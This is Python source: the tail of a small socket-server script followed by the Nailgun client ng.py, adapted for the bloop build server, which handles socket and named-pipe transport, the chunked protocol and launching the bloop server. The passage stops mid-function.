print("Port : ")
PORT = int(input(""))
ADDR = (SERVER, PORT)
server.bind(ADDR)
print("[SERVER] Server is starting...")
bootup()
except:
print("Server setup failed. Press any key to exit")
input("")
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import os.path
import tempfile
import select
import socket
import struct
import sys
from threading import Condition, Event, Thread, RLock
from subprocess import CalledProcessError, check_call
is_py2 = sys.version[0] == "2"
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
def to_bytes(s):
return bytes(s, "utf-8")
def bytes_to_str(bytes_to_convert):
"""Version independent way of converting bytes to string."""
return bytes_to_convert if is_py2 else bytes_to_convert.decode("utf-8")
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "0.9.3"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 8212
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno"):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
with open(filename) as f:
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_file:
dest_file.write(bytes_to_str(self.buf[:bytes_received]))
dest_file.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
try:
k32 = ctypes.CDLL("Kernel32", use_errno=True)
except OSError:
k32 = ctypes.CDLL("Kernel32.dll", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
byte_count=len(bbuf)
struct.pack_into(">ic", header_buf, 0, byte_count, chunk_type)
# these chunk types are not required for server to accept and process and server may terminate
# any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
# The server may send termination signal and close the socket immediately; attempt to write
# to such a socket (i.e. heartbeats) results in an error (SIGPIPE)
# Nailgun protocol is not duplex so the server does not wait on client to acknowledge
# We catch an exception and ignore it if termination has happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
if not conn.stdin or eof:
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(add_help_option=False, usage="%prog [options] cmd arg1 arg2 ...")
# +++ a/bloop
parser.disable_interspersed_args()
# --- b/bloop
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
parser.add_option('-h', '--help', action='store_true', dest='help_set')
parser.add_option('--server-location', type='string', dest='server_location')
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
if options.help_set and not args:
cmd = "help"
cmd_args = []
else:
# Pass any remaining command line arguments to the server.
cmd_args = args
# The command we need to execute gets written
# to the --out-file parameter. If the user
# hasn't specified this we hijack it
out_file_temp = tempfile.NamedTemporaryFile()
out_file_path = out_file_temp.name
if cmd == "console":
try:
index = cmd_args.index("--out-file")
except:
index = -1
if index != -1:
out_file_path = cmd_args[index + 1]
else :
cmd_args = [cmd_args[0], "--out-file", out_file_path] + cmd_args[1:]
if cmd == "server":
nailgun_port = options.nailgun_port
try:
# Pick user-defined nailgun port after `server`
for arg in cmd_args:
if not arg.startswith("-"):
try:
nailgun_port = int(arg)
break
except ValueError:
print("Argument after `bloop server` is not a port " + str(arg) + ".")
if nailgun_port == options.nailgun_port:
print("Defaulting on nailgun port " + str(nailgun_port))
with NailgunConnection(
options.nailgun_server, server_port=nailgun_port
) as c:
print("Check if server is alive or not...")
exit_code = c.send_command("about", filearg=options.nailgun_filearg)
print("-------------------------------------------------------------------")
print("A bloop server is already running in port " + str(nailgun_port) + ".")
print("")
print(" - Do you want to spawn a bloop server in another port?")
print(" Run `bloop server $NAILGUN_PORT`.")
print(" - Do you want to kill the running server?")
print(" Run `bloop ng-stop --nailgun-port $NAILGUN_PORT` or `bloop ng-stop` for short.")
print("")
print("Questions? Reach us at https://gitter.im/scalacenter/bloop")
sys.exit(exit_code)
except NailgunException as e:
print("There is no server running at port " + str(nailgun_port))
print("Starting the bloop server... this may take a few seconds")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
server_location = os.path.join(basedir, "blp-server")
if not os.path.isfile(server_location):
if options.server_location:
server_location = options.server_location
else:
print("Bloop server could not be located in %s." % server_location)
print("Pass in the location with `--server-location` before the `server` command.")
sys.exit(1)
# Read jvm options from the .jvmopts file
jvmopts_file = os.path.join(basedir, ".jvmopts")
jvm_options_from_file = []
if os.path.isfile(jvmopts_file):
with open(jvmopts_file, "r") as jvmopts:
lines = jvmopts.read().splitlines()
for line in lines:
if line.startswith("-J"):
jvm_options_from_file.append(line)
else:
jvm_options_from_file.append("-J" + line)
try:
jvm_options_no_prefix = []
server_args = []
for jvm_arg in jvm_options_from_file:
if jvm_arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(jvm_arg[2:])
for arg in cmd_args:
if arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(arg[2:])
else:
server_args.append(arg)
# Works in Windows and installations that have a jar instead of a script
print("Running " + server_location + " as a jar...")
java_cmd = ["java"] + jvm_options_no_prefix + ["-jar", server_location] + server_args
print("Shelling out with '" + str(java_cmd) + "' ...")
check_call(java_cmd)
except CalledProcessError as e:
# Works in systems such as Mac OS or Nix that in which blp-server is a script
try:
jvm_options_with_prefix = [ "-J" + opt for opt in jvm_options_no_prefix ]
print("Running " + server_location + " as a script...")
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Windows with " + str(cmd))
check_call(cmd)
else:
cmd = ["sh", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Unix system with " + str(cmd))
check_call(cmd)
except CalledProcessError as e2:
print("Bloop server in %s failed to run." % server_location)
print("First invocation attempt: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
print("Second invocation attempt: %s" % e2.cmd)
print("-> Return code: %d" % e2.returncode)
# Only use the return code of the first attempt
sys.exit(e.returncode)
except KeyboardInterrupt as e:
sys.exit(0)
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
if cmd == "repl":
sys.stderr.write("Did you mean `bloop console`?\n")
sys.exit(1)
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
# the user might have specified a REPL to use
